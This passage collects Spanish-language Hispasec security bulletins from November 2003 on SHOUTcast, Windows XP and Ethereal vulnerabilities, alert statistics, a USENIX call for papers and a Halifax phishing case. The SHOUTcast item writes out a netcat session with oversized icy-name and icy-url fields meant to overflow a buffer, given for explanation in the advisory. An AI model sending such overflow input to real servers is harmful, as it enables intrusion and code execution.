ser utilizada por usuarios maliciosos para comprometer la seguridad
de un sistema.

SHOUTcast es un sistema de streaming de audio desarrollado por
Nullsoft (los creadores del también muy popular Winamp).

Dicha vulnerabilidad, confirmada en la versión 1.9.2, consiste en
enviar peticiones al servidor (sobre los parámetros icy-name e icy-url)
de un tamaño excesivo y especialmente formadas a tal efecto, con lo
que puede provocarse un desbordamiento de búfer y ejecutar código
arbitrario.

Un ejemplo de esto sería el siguiente (utilizando netcat para realizar
la operación):

>nc ip-maquina-blanco 8001
changeme
icy-name:AAA...[Ax275]BBBB[reescribe del EAX]
icy-genre:DoS radio
icy-url:AAA...[Ax288]BBBB[reescribe EAX]
icy-pub:1
icy-irc:N/A
icy-icq:N/A
icy-aim:N/A
icy-br:160

Se tiene constancia de la circulación de código de explotación de
esta vulnerabilidad.


Julio Canto
jcanto@hispasec.com


Más información:

SHOUTcast Server Buffer Overflow (icy-name, icy-url)
http://www.securiteam.com/securitynews/6G0020U8UQ.html

SHOUTcast Homepage:
http://www.shoutcast.com

jueves, 6 de noviembre de 2003

Informe SANA de octubre: Cerca de 500 alertas en un mes

Un total de 495 alertas emitidas durante el mes de octubre a través
del servicio SANA de alertas y vulnerabilidades a medida de Hispasec
Sistemas.

El Servicio de Análisis, Notificación y Alertas (SANA) de Hispasec
Sistemas documentó y distribuyó 16 nuevas alertas de seguridad y
parches diarias durante el pasado mes de octubre. Pese a que el número
de alertas sigue mostrando un crecimiento constante, no ha sido un mes
que destaque por el número de incidencias en materia de seguridad
informática, ni por su gravedad o repercusión, en comparación con
periodos anteriores.

Algunas de las plataformas más afectadas fueron los sistemas y
aplicaciones de HP con un total de 119 alertas publicadas un 24% de
los avisos, seguido de los sistemas de Sun con 74 informaciones
emitidas (14,95%), los sistemas AIX de IBM con 30 (un 6%), Microsoft
con 24 (4,84%) y las distribuciones Mandrake (2,42%) y RedHat (2,22%)
respecto del total de las alertas.

Según la clasificación de SANA, 143 (un 28,88%) de las alertas se han
considerado de riesgo alto, el 6,06% Medio-Alto, 185 de ellas (el
37,37%) de nivel medio, mientras que el 27,47% restante se han
calificado como de riesgo medio-bajo y bajo.

Una gran mayoría de estas vulnerabilidades, 400 (un 80,80%) contaron
con actualizaciones y parches para corregirlas, mientras que para el
resto Hispasec documentó contramedidas y acciones preventivas
adicionales a la espera de la solución oficial.

Todos estos datos evidencian una realidad, resultante del elevado
número de vulnerabilidades y parches que se publican diariamente

Estos datos reflejan como entre los problemas de seguridad más
comunes, en especial en entornos corporativos, se encuentran las
dificultades para llevar a cabo un seguimiento de todas las
actualizaciones, nuevas vulnerabilidades, y amenazas que pueden
afectar a un parque heterogéneo de sistemas. Así como el tiempo
empleado por los técnicos de seguridad, ya no en instalar las
actualizaciones, sino simplemente en localizar toda esa información.
Tiempo que en la actualidad se estima superior a una media superior
a las 4 horas diarias.

Un indicador más claro y real del número de alertas y estadísticas de
SANA puede seguirse en la actualidad desde la portada de la web de
Hispasec (http://www.hispasec.com), en la columna derecha, es posible
acceder a una gráfica y obtener datos cuantitativos en tiempo real
sobre el número de avisos (vulnerabilidades, actualizaciones, etc.)
que emite el servicio semanalmente.


Antonio Ropero
antonior@hispasec.com


Más información:

Servicio SANA de Hispasec Sistemas:
http://www.hispasec.com/directorio/servicios/sana

miércoles, 5 de noviembre de 2003

Ejecución de código arbitrario por botones de Microsoft Windows XP

Se ha descubierto una vulnerabilidad la generación de botones de
Windows XP que permite a un usuario malicioso ejecutar código
arbitrario.

Las aplicaciones que tienen el nuevo 'look XP' usan la CommCtl32.dll
versión 6. Este componente debe ser explícitamente incluido en ellas,
e incluye algunos mensajes nuevos para el control botón:
BCM_GETIDEALSIZE
BCM_GETIMAGELIST
BCM_GETTEXTMARGIN
BCM_SETIMAGELIST
BCM_SETTEXTMARGIN

Los dos mensajes 'TEXTMARGIN' utilizan un RECT * como lParam, un
patrón común que presentan muchos controles que pueden ser explotados
mediante mensajes de Windows. De hecho, se pueden inyectar código
arbitrario en las aplicaciones a través de este tipo de botón para XP.

Cualquier aplicación privilegiada que use el estilo visual de XP y que
cree una ventana en el escritorio interactivo puede ser utilizada por
un atacante para realizar una escalada de privilegios.

Se tiene constancia de la existencia de código de explotación de dicha
vulnerabilidad.


Julio Canto
jcanto@hispasec.com



martes, 4 de noviembre de 2003

Desbordamiento de búfer en disección de protocolos de Ethereal

Se han descubierto algunas vulnerabilidades en Ethereal que pueden ser
explotadas por usuarios maliciosos para provocar una denegación de
servicio o comprometer un sistema vulnerable.

Ethereal es un analizador de protocolos de red gratuito para entornos
Unix y Windows. Permite examinar datos directamente 'esnifándolos' de
la red o de un archivo de captura, y posee diversas utilidades para
hacer más cómodo el trabajo con estos datos, como un potente lenguaje
de filtrado de visualización.

El programa contiene ciertos errores de tamaño de búfer en el manejo
de los protocolos GTP y SOCKS que pueden ser explotados para provocar
desbordamientos de búfer, lo que podría llevar a la ejecución de
código arbitrario en un sistema vulnerable.

También se ha anunciado que existen errores sin especificar en el
manejo de paquetes ISAKMP y MEGACO que pueden ser explotados para
interrumpir la ejecución de Ethereal o Tethereal.

La explotación con éxito de cualquiera de estas técnicas requieren que
Ethereal o Tethereal estén siendo ejecutados o que abran un archivo de
traza con los paquetes maliciosos antes nombrados.

La versión 0.9.16 no es vulnerable a este ataque. Está disponible en
la siguiente dirección: http://www.ethereal.com/download.html


Julio Canto
jcanto@hispasec.com


Más información:

Security problems in Ethereal 0.9.15
http://www.ethereal.com/appnotes/enpa-sa-00011.html

lunes, 3 de noviembre de 2003

Llamada a ponencias para la "USENIX Security Conference" de 2004

USENIX acaba de publicar la llamada a ponencias para la décimo tercera
conferencia de seguridad USENIX, a celebrar del 9 al 13 de Agosto de
2004 en San Diego, California (EE.UU.).

USENIX es una asociación nacida en 1975, desarrollando infinidad de
iniciativas orientadas al avance de la tecnología informática, la
seguridad y la resolución de problemas prácticos. En concreto, organiza
afamados simposios anuales especializados en Seguridad.

Algunos de los temas propuestos, no exclusivos, son:

* Análisis de código malicioso.

* Análisis de protocolos de red y protocolos de seguridad.

* Aplicación de técnicas criptográficas.

* Ataques DoS (Denegación de Servicio) y contramedidas.

* Detección de intrusos.

* Tecnología de cortafuegos.

* Infraestructura de clave pública.

* Seguridad en el voto por Internet.

* Privacidad.

* Autentificación.

* Herramientas de auditoría automática de código fuente.

* ...

La fecha límite para proponer trabajos termina el próximo 25 de Enero de
2004. En caso de ser aceptados, la versión final de los artículo debe
presentarse antes del 18 de Mayo de 2004.


Jesús Cea Avión
jcea@hispasec.com


Más información:

13th USENIX Security Symposium
(Security '04)
http://www.usenix.org/events/sec04/

Security '04 Call for Papers
http://www.usenix.org/events/sec04/cfp/

domingo, 2 de noviembre de 2003

Halifax afectada por robo de datos de identidad

Al igual que otras entidades financieras, Halifax se ve afectado por
un problema que se está convirtiendo en habitual en estos últimos
tiempos: la suplantación del remitente en mensajes de correo
electrónico con el fin de sustraer información de usuarios. Este
delito se conoce comúnmente con el nombre de "phishing".

En este caso. Halifax, que tiene 1,5 millones de clientes online, ha
llegado a tener que cerrar sus operaciones de Internet durante la
pasada semana, después de descubrir que a los clientes les estaban
enviando correos electrónicos falsos, pidiéndoles detalles personales.
Un portavoz de la entidad comentaba: "No sabemos cuánta gente recibió
los 'e-mails', aunque parece que lo hicieron indiscriminadamente",
"Los hemos rastreado hasta un sitio en Rusia y estamos trabajando
para cerrar ese sitio".

Otra vez nos encontramos con intento de fraudes a clientes de bancos
mediante el método de suplantación de remitente en el correo
electrónico, como en su día ocurrió con entidades financieras como
BBVA, Citibank, Lloyds TSB, Natwest, o el Royal Bank of Scotland.

Desde Hispasec Sistemas esperamos que las alertas y correspondientes
recomendaciones que dimos en su día hayan servido para evitar este
tipo de fraude por lo menos en alguno de estos usuarios.

No obstante volveremos a recordar las recomendaciones que en su día
dimos.

"Recomendamos a nuestros lectores y a los usuarios en general que
siempre desconfíen de este tipo de peticiones que una compañía jamás
haría a sus clientes. No deben introducir datos (especialmente
relativos a información bancaria y contraseñas) en sitios cuya autoría
sea dudosa o no esté contrastada, así como verificar la existencia de
los correspondientes certificados."


Antonio Román
roman@hispasec.com


Más información:

E-mail scam targets online bank
http://news.bbc.co.uk/1/hi/business/3214751.stm

Halifax suspends e-banking site after phishing attack
http://www.theregister.co.uk/content/55/33602.html

Halifax suspends e-banking site after phishing attack
http://www.securityfocus.com/news/7308

Banco británico Halifax, víctima de ciberimpostores
http://www.unionradio.com.ve/noticias/ciencia/Notacie200310279955.htm

El banco británico Halifax, víctima de los 'hackers'
http://iblnews.com/noticias/10/90573.html

Intento de fraude a los clientes del BBVA
http://www.hispasec.com/unaaldia/1668

Nuevo caso de "phishing", esta vez con Citibank
http://www.hispasec.com/unaaldia/1763